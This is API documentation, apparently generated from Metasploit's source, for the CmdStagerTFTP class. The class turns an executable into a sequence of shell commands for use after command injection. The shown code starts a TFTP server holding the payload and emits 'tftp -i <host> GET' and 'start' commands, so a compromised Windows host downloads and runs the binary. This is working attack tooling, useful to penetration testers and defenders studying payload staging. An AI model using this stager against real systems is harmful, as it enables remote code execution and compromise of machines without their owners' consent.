Class: Rex::Exploitation::CmdStagerTFTP

Inherits:

CmdStagerBase

• Object
• CmdStagerBase
• Rex::Exploitation::CmdStagerTFTP

Defined in:

lib/rex/exploitation/cmdstager/tftp.rb

Overview

This class provides the ability to create a sequence of commands from an executable. When this sequence is ran via command injection or a shell, the resulting exe will be written to disk and executed.

This particular version uses tftp.exe to download a binary from the specified server. The original file is preserve, not encoded at all, and so this version is significantly simpler than other methods.

Requires: tftp.exe, outbound udp connectivity to a tftp server

Written by Joshua J. Drake

Instance Attribute Summary

• #exe ⇒ Object readonly

  NOTE: We don’t use a concatenation operator here since we only have a couple commands.

• #payload_exe ⇒ Object readonly

  Returns the value of attribute payload_exe.

• #tftp ⇒ Object

  Returns the value of attribute tftp.

Instance Method Summary

• #compress_commands(cmds, opts) ⇒ Object

  We override compress commands just to stick in a few extra commands last second..

• #initialize(exe) ⇒ CmdStagerTFTP constructor

  A new instance of CmdStagerTFTP.

• #setup(mod) ⇒ Object
• #teardown(mod = nil) ⇒ Object

Methods inherited from CmdStagerBase

#cmd_concat_operator, #encode_payload, #generate, #generate_cmds, #generate_cmds_decoder, #generate_cmds_payload, #parts_to_commands, #slice_up_payload

Constructor Details

#initialize(exe) ⇒ CmdStagerTFTP

Returns a new instance of CmdStagerTFTP.

# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 28

def initialize(exe)
  super
  @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end

Instance Attribute Details

#exe ⇒ Object (readonly)

NOTE: We don’t use a concatenation operator here since we only have a couple commands. There really isn’t any need to combine them. Also, the ms01_026 exploit depends on the start command being issued separately so that it can ignore it :)

# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 66

def exe
  @exe
end

#payload_exe ⇒ Object (readonly)

Returns the value of attribute payload_exe.

# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 67

def payload_exe
  @payload_exe
end

#tftp ⇒ Object

Returns the value of attribute tftp.

# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 68

def tftp
  @tftp
end

Instance Method Details

#compress_commands(cmds, opts) ⇒ Object

We override compress commands just to stick in a few extra commands last second..

# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 48

def compress_commands(cmds, opts)
  # Initiate the download
  cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"

  # Make it all happen
  cmds << "start #{@tempdir + @payload_exe}"

  # Clean up after unless requested not to..
  if (not opts[:nodelete])
    # XXX: We won't be able to delete the payload while it is running..
  end

  super
end

#setup(mod) ⇒ Object

# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 33

def setup(mod)
  tftp = Rex::Proto::TFTP::Server.new
  tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
  tftp.start
  mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end

#teardown(mod = nil) ⇒ Object

# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 40

def teardown(mod = nil)
  tftp.stop
end